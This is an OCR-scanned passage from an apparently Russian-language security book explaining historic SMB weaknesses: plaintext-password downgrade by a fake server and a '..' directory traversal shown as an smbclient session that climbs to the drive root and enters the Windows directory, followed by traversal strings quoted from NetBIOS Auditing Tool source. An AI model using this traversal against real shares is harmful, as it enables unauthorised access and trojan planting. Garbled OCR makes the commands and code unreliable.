Атаке, как указание клиенту передавать пароль в открытом виде, потому что

Сервер якобы не поддерживает зашифрованные пароли. Естественно, роль

Сервера здесь выполняет ложный сервер злоумышленника (см. главу 3).

Из-за поддержки устаревших с точки зрения безопасности сетевых решений SMB

Может быть подвержен атаке на получение доступа ко всему диску, если у

Злоумышленника есть права только на его часть (каталог). Для этого

взломщику достаточно указать имя каталога через ".." $snibclient

\\\\VICTIM\\SOME_DIR -n TRUSTME -m LANMAN2 -U HACKER -1 194.94.94.94

smb: \" dir suit): \" cd..

smb: \..\" dir

smb: \..\"cd \..\..

smb:\..\..\"dir

smb: \..\..\" get config.sys -

smb; \..\..\" cd windows

smb: \..\..\windows\"

Далее злоумышленник может поместить в системный каталог Windows, например,

"троянского" коня. Первоначальная реакция Microsoft: "Samba -это

неправильный клиент, и он не должен быть использован".

Аналогичные попытки делает и NAT (NetBIOS Auditing Tool) -

Распространенное средство анализа безопасности для Windows-сетей. Вот

фрагмент его исходного текста:

strcpy(cur_dir, "..\\*.*"):

Do_dir (inbuf, outbuf, cur_dir, fattr, cfflp_stash, False);

tested_stash = 0:

strcpy(cur_dir, "\\..\\*.*");

do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False):

tested_stash = 0;

strepy (cur_dir, "...\\*.*"),

Do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False);

tested_stash = 0;

strcpy (cur_dir, ".\\...\\*. *");